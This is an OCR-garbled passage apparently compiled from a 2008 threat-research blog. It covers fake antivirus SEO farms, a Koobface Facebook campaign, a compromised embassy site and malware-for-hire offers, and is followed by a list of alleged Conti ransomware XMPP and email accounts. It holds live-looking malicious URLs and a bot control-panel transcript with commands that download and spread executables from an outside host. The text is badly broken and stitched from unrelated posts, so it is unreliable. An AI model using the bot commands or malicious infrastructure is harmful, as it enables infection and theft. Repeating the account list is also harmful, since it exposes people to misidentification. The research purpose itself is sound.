hxxp://qaz[.]im/index[.]ohp?a=delete &q=1751767682 
hxxp://qaz[.]im/load/dN974Y/5dFfZA 
hxxp://qaz[.]im/index[.]php?a=delete &q=935824666 
hxxp://uibegvz4hxzraqjqc[.]onion/log/544696476 
hxxp://uibegvz4hxzrqjqc[. onion/log/544696239 
hxxp://privnote[.]com/refYewr9 
hxxp://privnote[.]com/rygPdZdj 


hxxp://blockchain[.]com/btc/tx/c157fde04a95393011322137a50c077b3d02d9f9 
735602ea39084e503398b0da 


hxxp://logdog[.]pw/?wNO9p7 

hxxp://qaz[. ]im/load/6k3h9e/5Ednei 
hxxp://logdog[.]pw/?9FIQAZg5IQWji4zZHZMQB 
hxxp://logdog[.]pw/?4l4ZCfP1z_rJRX6ntYdB 
hxxp://send[.]firefox[.]com/download/06859ada2d52e2e2/ 
hxxp://qaz[.]im/load/4bAKYK/ZbzAyk 
hxxp://qaz[.]im/index[.]php?a=delete &q=280950795 
hxxp://qaz[.]im/load/5bF87y/65kHys 
hxxp://qaz[.]im/index[.]php?a=delete &q=1175859614 
hxxp://send[.]firefox[.]com/download/c17909586619d150/ 
hxxp://www[.]sendspace[.]com/file/3vpu0s 
hxxp://send[.]firefox[.]com/download/73f5ecb8538d732e/ 
hxxp://send[.]firefox[.]com/download/e1150877d00fa8b2/ 
hxxp://uibegvz4hxzrqjqcl[.]onion/log/545400806 
hxxp://enigmal[.]onion/sdfeGGsdee2123/ 
hxxp://privnote[.]com/5U549Qse 
hxxp://qaz[.]im/load/3FnSDB/GAZnfb 
hxxp://qaz[.]im/index[.]php?a=delete &q=1125194461 
hxxp://privnote[.]com/JEOSVxjH 
hxxp://qaz[.]Jim/load/HArtQQ/B275Gi 
hxxp://qaz[.]im/index[.]php?a=delete &q=561838786 
hxxp://qaz[.]im/load/sArH24/z7ZeQy 
hxxp://qaz[.]im/index[.]php?a=delete &q=409838397 
hxxp://uibegvz4hxzrqjqc[.]onion/log/545427332 
hxxp://qaz[.]im/load/aZsi7z/Sk4iZn 
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advantage of blackhat SEO practices promising the removal of competing fake security 
software brands. 


Last week, the noadware .net (69.20.71.82; 69.20.104.139) software was persistently 
advertised in such a way, mostly by generating Wordpress accounts promising to remove 
competing software : 


antiviruspro2009.wordpress .com 
ultraantivirus2009.wordpress .com 
smartantivirus.wordpress .com 
antiviruslab2009.wordpress .com 
antivirusvip.wordpress .com 
personaldefender2009.wordpress .com 
malwareremoval.wordpress .com 


Naturally, it didn’t take long before blackhat SEO farms were created for the purpose, 
like these very latest ones : 


removal-tool.blogspot .com 
cgidoctor .com 
spywareremoval .net 
spyware-adware-remover .com 
spywarestop .com 
zero-adware .net 
adware-remove .com 
antispywaresecrets .com 
protectyourcomputerfromspyware .info 
cleanpcfree .net 

spyware-bot .com 
spywarezapper.co .uk 
thepcsecurity .com 
noadware-official-site .com 
spywaredoctorfavor .cn 
removespywareedge .cn 
thespywareremover .com 
virusremovalguru .com 
virusremovalguide .org 


The day when fake security software sites start attracting traffic by promising to remove 
other fake security software, is the day when we have clear evidence that an ecosystem has 
emerged. 


Related posts: 

[1]A Diverse Portfolio of Fake Security Software - Part Twelve 
[2]A Diverse Portfolio of Fake Security Software - Part Eleven 
[3]A Diverse Portfolio of Fake Security Software - Part Ten 
[4]A Diverse Portfolio of Fake Security Software - Part Nine 
[5]A Diverse Portfolio of Fake Security Software - Part Eight 
[6]A Diverse Portfolio of Fake Security Software - Part Seven 
[7]A Diverse Portfolio of Fake Security Software - Part Six 
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[8]A Diverse Portfolio of Fake Security Software - Part Five 
[9]A Diverse Portfolio of Fake Security Software - Part Four 
[10]A Diverse Portfolio of Fake Security Software - Part Three 
[11]A Diverse Portfolio of Fake Security Software - Part Two 
[12]Diverse Portfolio of Fake Security Software 


. http: //ddanchev. blogspot .com/2008/11/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev .blogspot.com/2008/10/diverse-portfolio-of-fake-security_28.htm 


ttp://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_22.html 
ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_16.html 
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2 

3 

4. 

5. 
6. 

7 

8 
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ttp://ddanchev .blogspot.com/2008/09/diverse-portfolio-of-fake-security_30.htm 
ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.html 


. http: //ddanchev.blogspot .com/2008/09/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev.blogspot.com/2008/08/diverse-portfolio-of-fake-security_25.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


11. http://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 
12. http://ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 


4.11.9 Dissecting the Latest Koobface Facebook Campaign (2008-11-13 15:16) 
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# Result — Protocol Host URL Body  Content-T... 
[9] in) 200 HTTP us.geocities.com jadanbates84findex.htm 1,020 text/htrl 
$) 1 200 HTTP wwiw.geocities.com /js_source/puSgeo. js 998 application)... 
[@) 2 200 HTTP us.adserver,yahoo.com j/a?f=76001548&p=geocit.., 155 text/html; c... 
$) 3 200 HTTP us.geocities.com /js_source/geoyvck08. js 1,448 application)... 
214 us.geocities.com fadanbates84/index.htm?... text/html 
|e) 5 200 HTTP us.geocities.com /js_source/tab04.html 929 text/html 
[@) 6 200 HTTP us.geocities.com /js_source/adframeO?. html 939 text/html 
=) ? 200 HTTP us.il.yimg.com fus.yimg.comfi/us/smbiz/e... 942 = image/gif 
=) 8 200 HTTP us.il.yimg.com fus.yimng.comfi/us/smbiz/e... 943 image/aif 
$3) 9 200 HTTP us.il.yimg.com jus. yima.comyi{me/mce. js 242 = applications... 
lostart. info 38  application/... 
$) 11 200 HTTP us.il.yimg.com jus. y¥img.com/si{me/mcl1.js 98  application/... 
{9} 12 200 HTTP themis.geocities.yahoo.com /themis{h.php?curl=http:/... 1,680 text/html; c... 
$) 13 200 HTTP us.il.yimg.com jus. y¥ima.comfi{me/mc2. js 2,140 = application/... 
im) 14 200 HTTP us.i1.yimg.com  fus.yimg.comsifus/smbiz/b... 1,293 image/gif 
5 off34.com {go/fb.php 9 text/html 
$) 16 200 HTTP themis.geocities.yahoo.com /themisfovad01.js 302 = application)... 
$) 17 200 HTTP us.js2.yimg.com fus.js.yimg.com/lib/smbjjs... 374 = application}... 
d youtube-go.com 10,476 text/html 
™) 19 200 HTTP us.il.vimg.com  fus.yimg.comfi/us/smallbiz... 0 = image/aif 
|e) 20 200 HTTP youtube-go.com /?ch=ea= 0 text/html 
[@} 21 200 HTTP youtube-go.com /?ch=kea= 10,476 text/html 
22 304 HTTP youtube-go.com /player.js 0 
S23 304 HTTP tl.extreme-dm.com —_fi.gif 0 
i) 24 200 HTTP youtube-go.com } 10,476 text/html 
2a 304 HTTP youtube-go.com /player.swf?pid=6123 0 
©) 26 200 ~=HTTP e2.extreme-dm.com /s11.g?login=leded&jv=y... 43 image/aif 


2? 304 HTTP youtube-go.com /tom.jpg 1) 


youtube-go.com jflash_update.exe 0 application)... 


The latest [1]Koobface malware campaign at Facebook, is once again exposing a diverse 
ecosystem worth assessing in times of active migration to alternative ISPs tolerating or 
conveniently ignoring the malicious activities courtesy of their customers. The - now removed 
- binaries that the dropper was requesting were hosted at the American International Baseball 
Club in Vienna, indicating a compromise. 


us.geocities .com/adanbates84/index.htm 

lostart .info/js/js.js (79.132.211.51) 

off34 .com/go/fb.php (79.132.211.51) 

youtube-spyvideo .com/youtube _file.html (58.241.255.37) 

ahdirz .com/moviel.php?id=638 &n=teen (208.85.181.69) 
top100clipz .com/m6/moviel.php?id=638 &n=teen (208.85.181.67) 
hq-vidz .com/moviel.php?id=638 &n=teen (208.85.181.68) 
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The dropper then phones back home to : 071108 .com/fb/first.php (79.132.211.50) with the 
binaries hosted at a legitimate site that’s been compromised : 


aibcvienna.org/youtube/ bnsetup24.exe 
aibcvienna.org/youtube/ tinyproxy.exe 


Related fake Youtube domains participating : 
catshof .com (79.132.211.51) 

youtube-spy .info (94.102.60.119) 
youtubehof .net (218.93.205.30) 
youtube-spyvideo .com (58.241.255.37) 
yyyaaaahhhhoooo.ocom .pl (67.15.104.83) 
youtube-x-files .com (94.102.60.119) 


The development of cybercrime platforms utilizing legitimate infrastructure only, has al- 
ways been in the works. With spamming systems relying exclusively on the automatically 
registered email accounts at free web based providers, to the automatic bulk registration of 
hundreds of thousands of domains enjoying a particular domain registrar’s weak anti-abuse 
policies, it would be interesting to monitor whether [2]marginal thinking or [3]improved OPSEC 
relying on compromised hosts will be favored in 2009. 
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Related posts: 


[4]Fa 
[5]Fa 


ke YouTube Site Serving Flash Exploits 
cebook Malware Campaigns Rotating Tactics 


[6]Phishing Campaign Spreading Across Facebook 


[7]La 


rge Scale MySpace Phishing Attack 


[8]Update on the MySpace Phishing Campaign 


[9]MySpace Phishers Now Targeting Facebook 


[10]MySpace Hosting MySpace Phishing Profiles 


. http: //blogs.zdnet .com/security/?p=2146 
. http://www. renesys.com/blog/2008/09/internet_vigilantism_1.shtm 


. http://ddanchev. blogspot .com/2008/06/fake-youtube-site-serving-flash.htm 


1 
2 
3. http: //ddanchev. blogspot .com/2008/10/cost- of -anonymizing-cybercriminals.htm 
4 
5 


. http: //ddanchev. blogspot .com/2008/08/facebook-malware-campaigns-rotating.htm 


6. http: //ddanchev. blogspot .com/2008/06/phishing-campaign-spreading-across.htm 


7. http: //ddanchev. blogspot .com/2007/11/large-scale-myspace-phishing-attack.htm 


8. http: //ddanchev. blogspot .com/2007/12/update-on-myspace-phishing- campaign. htm 


9. http: //ddanchev. blogspot .com/2008/01/myspace-phishers-now-targeting- facebook. htm 
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10 Embassy of Brazil in India Compromised (2008-11-13 16:18) 
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Only an amateur or unethical competition would embedd [1]malicious links at the Embassy of 
Brazil in India’s site, referencing their online community. With the chances of [2]an Embassy 
involvement into the fake antivirus software industry close to zero, let’s assess the attack that 
took place. 
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The compromise is a great example of a mixed use of pure malicious domains in a combination 
with compromised legitimate ones and on purposely registered accounts at free web space 
providers, hosting the blackhat SEO content. However, digging deeper we expose the entire 
malicious doorways ecosystem pushing PDF exploits, banker malware and Zlob variants. The 
malicious attackers embedded links to their blackhat SEO farms advertising fake security 
software, and also a link to a traffic redirection doorway 
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epmwckme.dex1.com 
htkobaf.dex1.com 
ogbucof.dex1.com 
segundomuelle.com/mex/antivirus 
jgzleaa.dexl.com 
igpran.ru/services/tolstye 


The active and redirecting traff .asia (89.149.251.203) is currently serving a fake account 
suspended notice - "This account has been suspended. Either the domain has been overused, 
or the reseller ran out of resources." but is whatsoever redirecting us to antimalwareO9 .net. 
This particular traffic redirection doorway is actively redirecting us to a command and control 
server running a well known web malware exploitation kit which is currently serving PDF 
exploits. 


google-analyze .com/socket/index.php (216.195.59.77) from where we’re redirected to google- 
analyze.com/tracker/load.php which is serving system.exe (Trojan-Spy.Win32.Zbot.ehk; 
Win32.TrojanSpy.Zbot.gen!C.5), and google-analyze .com/tracker/pdf.php (Ex- 
ploit:Win32/Pdfjsc.G; Exploit.JS.Pdfka.w; Bloodhound.Exploit.196). Naturally, within the 
live exploit URLs there are multiple IFRAMEs redirecting us to more of this group’s campaigns. 
google-analyze .com has multiple IFRAMEs pointing to google-analystic .net (209.160.67.56), 
yet another traffic redirection doorway further exposing their campaigns. 


For instance, google-analystic .net/in.cgi?20 loads google-analystic.net/tea.php 
(209.160.67.56) where google-analystic .net/in.cgi?8 is redirecting to 91.203.93.61 /in.cgi?2 
taking us to 91.203.93.61 /25/2/ where we deobfuscate the javascript leading us to the exact 
location of the PDF exploit - 91.203.93.61 /25/2/getfile.php?f=pdf. This is just for starters. 
google-analystic .net/in.cgi?9 redirects to mangust32 .cn/pod/index.php (218.93.202.102) 
where they serve load.exe (Backdoor:Win32/Koceg.gen!A) at 

mangust32_ .cn/pod2/load.php and load.exe at mangust32 .cn/eto2/load.php, moreover, 
google-analystic .net/in.cgi?10 leads us to mmcounter .com/in.cgi?id194 (94.102.50.130) a 
traffic management login which is no longer responding. The last IFRAME found within google- 
analystic points to busyhere .ru/in.cgi?pipka (91.203.93.16) which redirects to beshragos 
.com/work/index.php (79.135.187.38) where once we deobfuscate the script, we get to see 
the PDF exploit location beshragos.com /work/getfile.php?f=pdf. 


What’s contributing to the increase of PDF exploits durin the last month? It’s an updated 
2006 


version of a web based malware exploitation tool, which despite the fact that it remains pro- 
prietary for the time being, will leak in the next couple of weeks causing the usual short-lived 
epidemic. 


Related posts: 

[3]The Dutch Embassy in Moscow Serving Malware 
[4]U.S Consulate in St. Petersburg Serving Malware 
[5]Syrian Embassy in London Serving Malware 
[6]French Embassy in Libya Serving Malware 


_fep://aecuritylabe websonse,con/content/Alerts/2028.a5pd 
| Kip: //evy brextlenbaaay in] 
. http: //ddanchev. blogspot . com/2008/01/dut ch-embassy- in-moscow-serving-malware. html 
| http://adanchey blogspot .con/2007 /09/us-consulate-st~petersburg-serving. hin] 


ttp://ddanchev.blogspot.com/2007/09/syrian-embassy-in-london-serving. htm 
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ttp://ddanchev.blogspot.com/2007/12/have-your-malware-in-timely-fashion. html 


4.11.11 Will Code Malware for Financial Incentives (2008-11-18 12:54) 
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#include “includes h* 
Sinclude “functions. h* 
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int Get 
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A couple of hundred dollars can indeed get you state of the art [l]undetectable piece of 
malware with post-purchase service in the form of automatic lower detection rate for sure, 
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but what happens when the vendors of such releases start vertically integrating just like 


everyone else, and start offering OS-independent spamming, flooding, modifications and 
tweaking of popular crimeware kits in the very same fashion? The quality assurance process 


gets centralized into the hands of experienced programmers that have been developing 
cybercrime facilitating tools for years. 
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It’s interesting to monitor the pricing schemes that they implement. For instance, the mod- 
ularity of a particular malware, that is the additional functions that a buyer may want or not 
want, increase or decrease the price respectively. Others, tend to leave the price open topic 
by only mentioning the starting price for their services and they increasing it again in open 


topic fashion. 


Let’s take look at some recently advertised (translated) "malware coding for hire" propo- 
sitions, highlighting some of the latest developments in their pricing strategies : 
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ialized 
7.8.0.1:7778 with code: testmaster 
-8.1:7778 


Reconnect 
Lis clients Cady> er of clients 
y Reconnect user uk Kill user + uc Command user 
* Reconnect all ak Kill all i ac Command all 
Mute H H Query user 


List onjoin commands { je i jy Remove onjoin cmd 


y Server restart : sq Server quit 


ux 127.6.6.1-71116 
21:26:44] EVENT: Quit 127.@.0.1:1116 


= On~-join command: Total: @ 


Server: On-—join command added 
ad http://website.com/hbot .exe 
EVENT: Server: On-join command added 


EVENT: On~-join command: 1: usbspread 
= On-join command: 2: msnspread http://website.con/hbot .exe 
=: On-—join command: Total: 


: Server: On-join command removed 


EVENT: On-join command: 2: nsnspread http://website .con/bot .exe 
: EVENT: On-join command: Total: 1 
7.6.6.1-:1118 


sr 

Are you sure? Cpress y and then enter, else any other key> 
21:29:07) EVENT: Connection has been dropped. 
Reconnecting... 

Networking initialized 

Connecting to: 127.6.80.1:7778 with code: testmaster 
Connected to 127.6.6.1:77% 

>>>> 


m Mute on/off i: » Reconnect 


Proposition 1 : 

"Programs and scripts under the following categories are accepted : 

grabbers; spamming tools for forums, spamming tools for social networking sites, modifica- 
tions of admin panels for (popular crimeware kits), phishing pages 


Platform: software running on MAC OS to Windows 

Multitasking: have the capacity to work on multiple projects 

Speed and responsibility: at the highest level 

Pre-payment for new customers: 50 % of the whole price, 30 % pre-pay of the whole price for 
repreated customers 

Support: Paid 

Rates: starting from 100 euros 
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sy Server restart H 


Reconnecting... 

Networking initialized 

sjonnecting to: 127.0.@.1:56565 with code: 
Connected to 127.8.6.1:56565 

>>>> 

+ 

Mute on/off » Reconnect 


List clients H Number of clients 
» Reconnect user Kill user H c Command user 
e Reconnect all ak Kill all t ac Command all 
Mute user ¢ Mute all : Query user 


List onjoin commands | ja Add onjoin command { jy Remove onjoin cmd 


» Server restart Server quit 


+ 
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ac YV 
(21:54:31) TALK 1: 127.6.0.1:1165S: 
ar 
S3) BVENT: Quit: 127.@.0.1:1165 


ac download http://fuckyounigga 

(21:55:33) TALK 1: 127.6.0.1:1167: Failed? 

ac download 

(21:56:62) TALK 1: 127.6.6.1:1167: Done? C:\DOCUME™1\User\LOCALS™1\Temp\@8G.exe 
ac remove 

21:56:26] EVENT Qui i27.6.6.1:-11€ 


If, after speaking ultimate price, you decide to add to your order something else - the price 
change. Prepare the job immediately, which will understand what to do and how much it 
will cost you, if you have any suggestions for a price, then lays them immediately and not 
after the work is completed. If you order something that requires parsing your logs, and their 
continued use, you agree to provide "a significant portion of the logs, so that after putting the 
project did not raise misunderstandings due to the fact that some logs are no longer "fresh", 
because of their "uniqueness". In this case, for the finalization of the project will be charged 
an additional fee." 
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Code Definition Window |FDCall rowner | } Output 


This is an example of an "open topic pricing scheme" with the vendor offering the possibility 
to code the malware or the tool for any price above 100 euro based on what he perceives as 
features included within worth the price. 


Proposition 2: 

"Starting price for my malware is 250 EUR. Additional modules like P2P features, source code 
for a particular module go for an additional 50 EUR. If you’re paying in another currency the 
price is 200 GBP or 395 dollars. | sell only ten copies of the builder so hurry up. The trading 
process is simple - a password protected file with the malware is sent to you so you can see 
the files inside. You then sent the money and | mail you back the password. If you don’t like 
this way you lose. 


| can also offer you another deal, | will share the complete source code in exchange to 
access to a botnet with at least 4000 infected hosts because | don’t have time to play around 
with me bot right now. 


This proposition is particularly interesting because the seller is introducing basic under- 
standing of exchange rates, but most of all because he’s in fact offering a direct bargain 
in the form of access to a botnet in exchange for a complete source code of his malware 
bot. Both propositions are also great examples that vendors engage by keeping their current 
and potential customers up-to-date with [2]TODO lists of features to come next to the usual 
CHANGELOGS, and, of course, establish trust by allowing potential customers to take a peek 
at the source code of the malware they’re about to purchase. 


Related posts: 

[3]Coding Spyware and Malware for Hire 

[4]The Underground Economy’s Supply of Goods and Services 
[5]The Dynamics of the Malware Industry - Proprietary Malware Tools 
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[6]Using Market Forces to Disrupt Botnets 

[7]Multiple Firewalls Bypassing Verification on Demand 
[8]Managed Spamming Appliances - The Future of Spam 
[9]Localizing Cybercrime - Cultural Diversity on Demand 
[10]E-crime and Socioeconomic Factors 

[11]Russia’s FSB vs Cybercrime 

[12]Malware as a Web Service 

[13]Localizing Open Source Malware 

[14]Quality and Assurance in Malware Attacks 
[15]Benchmarking and Optimising Malware 
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4.11.12 New Web Malware Exploitation Kit in the Wild (2008-11-19 12:15) 


2013 


$16/day+ 1 day up to 11:59PM 


[39] 
UPDATE: 


The following is a complete list of all the personal Dark Web XMPP server accounts for the Conti 


ransomware gang. 
Ox00lord@q3mcco35auwcstmt.onion 
8383@q3mcco35auwcstmt.onion 
admintest@q3mcco35auwcstmt.onion 
ahtung@q3mcco35auwcstmt.onion 
ahtyng@q3mcco35auwcstmt.onion 
airbnbl1@q3mcco35auwcstmt.onion 
alarm@q3mcco35auwcstmt.onion 
alaska@q3mcco35auwcstmt.onion 
alert@q3mcco35auwcstmt.onion 
ali@q3mcco35auwcstmt.onion 
aloxa@q3mcco35auwcstmt.onion 
andy@q3mcco35auwcstmt.onion 
atlant@q3mcco35auwcstmt.onion 
axel@q3mcco35auwcstmt.onion 
baget@q3mcco35auwcstmt.onion 
band@q3mcco35auwcstmt.onion 
baxter@q3mcco35auwcstmt.onion 
bekeeper@q3mcco35auwcstmt.onion 
bentley@q3mcco35auwcstmt.onion 
bestofthebest@q3mcco35auwcstmt.onion 
bill@q3mcco35auwcstmt.onion 
black@q3mcco35auwcstmt.onion 
bob@q3mcco35auwcstmt.onion 
bonen@q3mcco35auwcstmt.onion 
booker@q3mcco35auwcstmt.onion 


20103 


bourbon@q3mcco35auwcstmt.onion 
braun@q3mcco35auwcstmt.onion 
buggati@q3mcco35auwcstmt.onion 
buh@q3mcco35auwcstmt.onion 
bullet@q3mcco35auwcstmt.onion 
bumer@q3mcco35auwcstmt.onion 
buri@q3mcco35auwcstmt.onion 
buza@q3mcco35auwcstmt.onion 
calmar@q3mcco35auwcstmt.onion 
cameron@q3mcco35auwcstmt.onion 
carter@q3mcco35auwcstmt.onion 
cesar@q3mcco35auwcstmt.onion 
chaos@q3mcco35auwcstmt.onion 
child@q3mcco35auwcstmt.onion 
chip@q3mcco35auwcstmt.onion 
chrom@q3mcco35auwcstmt.onion 
clickclack@q3mcco35auwcstmt.onion 
clipper@q3mcco35auwcstmt.onion 
cooler@q3mcco35auwcstmt.onion 
cosmos@q3mcco35auwcstmt.onion 
craft@q3mcco35auwcstmt.onion 
cruz@q3mcco35auwcstmt.onion 
cuba@q3mcco35auwcstmt.onion 
dallas@q3mcco35auwcstmt.onion 
dandis@q3mcco35auwcstmt.onion 
david@q3mcco35auwcstmt.onion 
defender@q3mcco35auwcstmt.onion 
delta@q3mcco35auwcstmt.onion 
deploy@q3mcco35auwcstmt.onion 
derek@q3mcco35auwcstmt.onion 
dereksupp@q3mcco35auwcstmt.onion 
dick@q3mcco35auwcstmt.onion 
doloto@q3mcco35auwcstmt.onion 
dominik@q3mcco35auwcstmt.onion 


domovoy@q3mcco35auwcstmt.onion 
20104 


doomsday@q3mcco35auwcstmt.onion 
dorirus@q3mcco35auwcstmt.onion 
duke@q3mcco35auwcstmt.onion 
electronic@q3mcco35auwcstmt.onion 
elon@q3mcco35auwcstmt.onion 
elvis@q3mcco35auwcstmt.onion 
fasker@q3mcco35auwcstmt.onion 
fast@q3mcco35auwcstmt.onion 
fergus@q3mcco35auwcstmt.onion 
finn@q3mcco35auwcstmt.onion 
fischer@q3mcco35auwcstmt.onion 
flip@q3mcco35auwcstmt.onion 
focus@q3mcco35auwcstmt.onion 
food@q3mcco35auwcstmt.onion 
ford@q3mcco35auwcstmt.onion 
forest@q3mcco35auwcstmt.onion 
fox@q3mcco35auwcstmt.onion 
frank@q3mcco35auwcstmt.onion 
frog@q3mcco35auwcstmt.onion 
ganesh@q3mcco35auwcstmt.onion 
gentleman@q3mcco35auwcstmt.onion 
ghost@q3mcco35auwcstmt.onion 
gideon777@q3mcco35auwcstmt.onion 
globus@q3mcco35auwcstmt.onion 
good@q3mcco35auwcstmt.onion 
grant@q3mcco35auwcstmt.onion 
green@q3mcco35auwcstmt.onion 
gringo@q3mcco35auwcstmt.onion 
grossman@q3mcco35auwcstmt.onion 
gus@q3mcco35auwcstmt.onion 
hash@q3mcco35auwcstmt.onion 
hof@q3mcco35auwcstmt.onion 
hopkins@q3mcco35auwcstmt.onion 
host@q3mcco35auwcstmt.onion 


huanivan@q3mcco35auwcstmt.onion 


20105 


ilon@q3mcco35auwcstmt.onion 
inat@q3mcco35auwcstmt.onion 
info@q3mcco35auwcstmt.onion 
ivanalert@q3mcco35auwcstmt.onion 
jafar@q3mcco35auwcstmt.onion 
kagas@q3mcco35auwcstmt.onion 
kaktus@q3mcco35auwcstmt.onion 
kent@q3mcco35auwcstmt.onion 
kerasid@q3mcco35auwcstmt.onion 
kerberos@q3mcco35auwcstmt.onion 
kevin@q3mcco35auwcstmt.onion 
keykey@q3mcco35auwcstmt.onion 
killer@q3mcco35auwcstmt.onion 
kingston@q3mcco35auwcstmt.onion 
koncord@q3mcco35auwcstmt.onion 
kurt@q3mcco35auwcstmt.onion 
lemur@q3mcco35auwcstmt.onion 
leo@q3mcco35auwcstmt.onion 
licor@q3mcco35auwcstmt.onion 
loadsupportl@q3mcco35auwcstmt.onion 
loadsupport2@q3mcco35auwcstmt.onion 
log@q3mcco35auwcstmt.onion 
logan@q3mcco35auwcstmt.onion 
longer@q3mcco35auwcstmt.onion 
lucas@q3mcco35auwcstmt.onion 
macros@q3mcco35auwcstmt.onion 
mango@q3mcco35auwcstmt.onion 
many@q3mcco35auwcstmt.onion 
marcus@q3mcco35auwcstmt.onion 
mario@q3mcco35auwcstmt.onion 
mark@q3mcco35auwcstmt.onion 
marsel@q3mcco35auwcstmt.onion 
matiz@q3mcco35auwcstmt.onion 
mavelek@q3mcco35auwcstmt.onion 


mavemat@q3mcco35auwcstmt.onion 
20106 


max@q3mcco35auwcstmt.onion 
mentos@q3mcco35auwcstmt.onion 
merch@q3mcco35auwcstmt.onion 
merlin@q3mcco35auwcstmt.onion 
miguel@q3mcco35auwcstmt.onion 
modar@q3mcco35auwcstmt.onion 
moms@q3mcco35auwcstmt.onion 
moon@q3mcco35auwcstmt.onion 
mors@q3mcco35auwcstmt.onion 
muhoboi@q3mcco35auwcstmt.onion 
mushroom@q3mcco35auwcstmt.onion 
naned@q3mcco35auwcstmt.onion 
nik-da@q3mcco35auwcstmt.onion 
oliver@q3mcco35auwcstmt.onion 
olsen@q3mcco35auwcstmt.onion 
oscar@q3mcco35auwcstmt.onion 
panda@q3mcco35auwcstmt.onion 
parker@q3mcco35auwcstmt.onion 
perry@q3mcco35auwcstmt.onion 
phantom@q3mcco35auwcstmt.onion 
pin@q3mcco35auwcstmt.onion 
pincus@q3mcco35auwcstmt.onion 


pineapple@q3mcco35auwcstmt.onion 


poll@conference.q3mcco35auwcstmt.onion 


poll@q3mcco35auwcstmt.onion 
ponetre@q3mcco35auwcstmt.onion 
price@q3mcco35auwcstmt.onion 
private@q3mcco35auwcstmt.onion 
professor@q3mcco35auwcstmt.onion 
proffjeck@q3mcco35auwcstmt.onion 
qwertycatt@q3mcco35auwcstmt.onion 
rand@q3mcco35auwcstmt.onion 
redmond@q3mcco35auwcstmt.onion 
reshaev@q3mcco35auwcstmt.onion 


revan@q3mcco35auwcstmt.onion 


20107 


revers@q3mcco35auwcstmt.onion 
rox@q3mcco35auwcstmt.onion 
rozetka@q3mcco35auwcstmt.onion 
salamandra@q3mcco35auwcstmt.onion 
sand@q3mcco35auwcstmt.onion 
sandy@q3mcco35auwcstmt.onion 
Savage@q3mcco35auwcstmt.onion 
sharn@q3mcco35auwcstmt.onion 
shell@q3mcco35auwcstmt.onion 
skywalker@q3mcco35auwcstmt.onion 
slon@q3mcco35auwcstmt.onion 
snow@q3mcco35auwcstmt.onion 
song@q3mcco35auwcstmt.onion 
spider@q3mcco35auwcstmt.onion 
staff@q3mcco35auwcstmt.onion 
stakan@q3mcco35auwcstmt.onion 
stefan@q3mcco35auwcstmt.onion 
steller@q3mcco35auwcstmt.onion 
stern@q3mcco35auwcstmt.onion 
steve@q3mcco35auwcstmt.onion 
strix@q3mcco35auwcstmt.onion 
summit@q3mcco35auwcstmt.onion 
sunday@q3mcco35auwcstmt.onion 
swift@q3mcco35auwcstmt.onion 
taker@q3mcco35auwcstmt.onion 
talar@q3mcco35auwcstmt.onion 
target@q3mcco35auwcstmt.onion 
taur@q3mcco35auwcstmt.onion 
terry@q3mcco35auwcstmt.onion 
test@q3mcco35auwcstmt.onion 
tilar@q3mcco35auwcstmt.onion 
tnt@q3mcco35auwcstmt.onion 
tom@q3mcco35auwcstmt.onion 
total@q3mcco35auwcstmt.onion 
troy@q3mcco35auwcstmt.onion 
20108 


trumen@q3mcco35auwcstmt.onion 
trump@q3mcco35auwcstmt.onion 
tunotif@q3mcco35auwcstmt.onion 
tunri@q3mcco35auwcstmt.onion 
twin@q3mcco35auwcstmt.onion 
twister@q3mcco35auwcstmt.onion 
urban@q3mcco35auwcstmt.onion 
urbanone@q3mcco35auwcstmt.onion 
vicevl1@q3mcco35auwcstmt.onion 
van@q3mcco35auwcstmt.onion 
vang@q3mcco35auwcstmt.onion 
vertu@q3mcco35auwcstmt.onion 
victor@q3mcco35auwcstmt.onion 
viper@q3mcco35auwcstmt.onion 
watson@q3mcco35auwcstmt.onion 
weav@q3mcco35auwcstmt.onion 
werka@conference.q3mcco35auwcstmt.onion 
winston@q3mcco35auwcstmt.onion 
workmanl@q3mcco35auwcstmt.onion 
workman2@q3mcco35auwcstmt.onion 
xargs@q3mcco35auwcstmt.onion 
xmoney@q3mcco35auwcstmt.onion 
xnull@q3mcco35auwcstmt.onion 
Xxx@q3mcco35auwcstmt.onion 
zulas@q3mcco35auwcstmt.onion 
UPDATE: 


The following is a full list of personal address accounts which are known to have been used by 
members of the Conti ransomware gang. 


catuta@tuta.io 
foundun@protonmail.com 
max3100@protonmail.com 
warabail@tutamail.com 
pharaon78@tutanota.com 
batrade@mail.ru 
ccncco@protonmail.com 
husbrand@protonmail.com 
20109 


songteng@tutanota.com 
dastin707@protonmai.com 
timman@tutanota.com 
exploitdb@exploit.im 
volhvb@exploit.im 
ivanalert@jabber.ru 
ela@jabber.otr.im 
flip@avtonom.org 
vasyamilov@thesecure.biz 
dail@jabber.sk 
cosm123@xmpp.jp 
vkaryagin@jabber.ru 
flavius@thesecure. biz 
nsummer@jabberpl.org 
alexeipi@jabber.ru 
duhastich@jabber.ru 
nsjxlc@safejid.com 
m2686@jabber.ru 
karmeone@ro.ru 
mustanota@tutanota.com 
nggfhfhhvcfdhgjyg 7t88958685@gmail.com 
joseph.jacqueline@mail.ru 
nminakerawatsonn@gmail.com 
ncatuta@tuta.io 
sdferwMelissaJBurke3513fghsad@protonmail.com 
nolobanstok1999vanahear@protonmail.com 
maxhalikus@xmpp.ru 
baton@xmpp.jp 
batono@xmpp.jp 
nPtuva8712@mail.ru 
ndog3112@outlook.de 
ncurtgaebriel@gmail.com 
nprtwin02@yahoo.com 
nnicolas.veneziale@gmail.com 
nmahesha88@hotmail.com 
20110 


nchrisduffy17@gmail.com 
n25novitskiy@gmail.com 
nplongell1@googlemail.com 
nbayle.docsavage@gmail.com 
njaymurray.murray@gmail.com 
nicarus __83@hotmail.com 
njaredkahI22@gmail.com 
nryan.stuart.011@gmail.com 
ncc33dfg9@hotmail.com 
npazwhyte@gmail.com 
njeroenmooijman@hotmail.com 
newera@keemail.me 
ostofford@protonmail.ch 
dasix@protonmail.com 
hurecer@rambler.ru 
johnsher@protonmail.com 
tunnep@protonmail.com 
oxu@ro.ru 

huazo@lenta.ru 
freeos2@yandex.ru 
freeos2@tuta.io 

dastoon@ro.ru 
okx@keemail.me 
